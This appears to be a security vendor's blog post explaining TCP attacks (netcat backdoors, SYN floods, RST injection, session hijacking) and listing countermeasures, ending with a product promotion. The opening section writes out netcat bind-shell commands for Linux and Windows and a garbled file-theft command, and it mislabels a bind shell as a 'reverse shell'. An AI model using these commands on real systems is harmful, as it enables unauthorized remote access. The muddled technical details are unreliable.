|
You opened an email attachment (exe or pdf) and inadvertently initiated a connection from your device to the attacker machine where his netcat is listening. A few bad things could happen in the execution of that embedded attachment you clicked. With enough finesse, the hacker creates a backdoor using netcat on your system that they can come back to at any time.
For example, hacker code could do the followings:
- Create a backdoor if your system is Linux:
nc -l -p 2222 -e /bin/bash
- Create a backdoor if your system is a windows:
nc -l -p 1337 -e hack.exe
-
Then, this will open a listener on your system (192.168.1.35) and pipe the command shell or the Linux bash shell to the hacker system.
nc 192.168.1.35 2222
- To steal your file, the hacker will issue the following command from his computer.
nc -v -w 20 -p 8888 -l yourBankStatement.pdf
Heads up, your Windows Security has a setting 'Realtime protection' that will block this reverse shell attack. Make sure your computer has it enabled.
The Transmission Control Protocol (TCP) represents a special genre of vulnerabilities in protocol design and implementation. This socket framework is as old as slice bread. Security hardening often come as an add-in afterthought by wrapping it with a coat of armor.
TCP attacks range from TCP SYN flood attack, SYN cookies, Reset attack, Session hijacking to Reverse Shell exploit. Let's make sense of it all why we need counter measures.
-
TCP SYN flood attack exploits a vulnerability in the TCP/IP handshake in an attempt to disrupt a web service. A SYN flood is a form of denial-of-service attack in which an attacker rapidly initiates a connection to a server without finalizing the connection. The server has to spend resources waiting for half-opened connections, which can consume enough resources to make the system unresponsive to legitimate traffic.
-
An important aspect of the TCP protocol is that it supports having different flags on TCP packets, one of which is the “Reset” flag (“RST”). The idea behind this flag is that if a party on a TCP connection receives a TCP Reset packet from the other party, it will immediately close the connection. The hacker can disrupt legitimate connection by injecting TCP packet with RST flag to cause denial of service.
-
Session hijacking, also known as cookie hijacking, is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. The goal of the TCP session hijacker is to create a state where the client and server are unable to exchange data (cutting in line and changing the destination of the packet to redirect traffic to the hacker's machine); This in turn enabling him/her to forge acceptable packets for both ends, mimicking the real packets. Thus, the attacker is able to gain control of the session.
Counter Measures:
- Obviously, do not click on suspicious attachments.
- Encrypt session id will increase the complexity of the session id prediction.
- Send session id over SSL.
- Use switches rather than hubs.
- Ensure server side and client side protection software.
- Use IDS for detecting ARP spoofing/Poisoning.
- Use long random numbers for session id.
- Implement timeout for the session when the session is logged out, or session id expires.
- Have different session id for each page.
- Check the web application for all errors.
- Using IPSec is a valid defense mechanism.
- Use secure protocols instead of clear text protocols like HTTP, FTP, Telnet, Rlogin, etc.
How do you know you have been hacked?
Unfortunately, TCP hack incidents could go unnoticed for a long time. AES LLC has got you covered with our enterprise analysis toolkit. CleverView for CTrace and CleverView for TCPIP.
| 
